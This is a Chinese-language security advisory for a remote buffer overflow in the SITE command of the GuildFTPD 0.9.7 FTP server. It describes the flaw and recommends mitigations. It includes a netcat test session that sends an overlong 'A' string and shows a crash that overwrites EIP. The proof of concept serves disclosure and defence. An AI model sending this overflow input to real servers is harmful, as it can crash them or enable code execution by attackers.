GuildFTPD 远程缓冲区溢出漏洞
发布日期:2001-05-31
更新日期:2001-05-31
受影响系统:
DrPhibez and Nitro187 Guild FTPD 0.9.7
- Microsoft Windows 98
- Microsoft Windows NT 4.0
描述:
BUGTRAQ ID: 2782
GuildFTPD 是一个Microsoft Windows 9x/NT平台下的免费FTP服务器
GuildFTPD 存在一个远程溢出问题,攻击者可能造成对FTP服务器拒绝服务或者执行任意代码。
sitecmd.dll负责解释执行SITE命令,其中存在缓冲区溢出漏洞。如果SITE命令超过261字节,发生缓冲区溢出,潜在允许执行任意代码。
<* 来源:Andreas Junestam (
andreas@defcom.com)
Janne Sarendal (
janne@defcom.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
C:\>nc 127.0.0.1 21
220-GuildFTPD FTP Server (c) 1999,2000
220-Version 0.97
220 Please enter your name:
user a
331 User name okay, Need password.
pass a
230 User logged in.
site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000
edi=009ed9e0
eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
注意到EIP寄存器值目前为0x41414141,意味着这种溢出可以有效利用。
建议:
临时解决方法:
禁止不可信用户访问您的FTP服务器。
厂商补丁:
目前厂商还没有提供补丁程序,您可以随时关注厂商主页获取最新版本:
http://guildftpd.ztnet.com/index.html浏览次数:4901
严重程度:0(网友投票)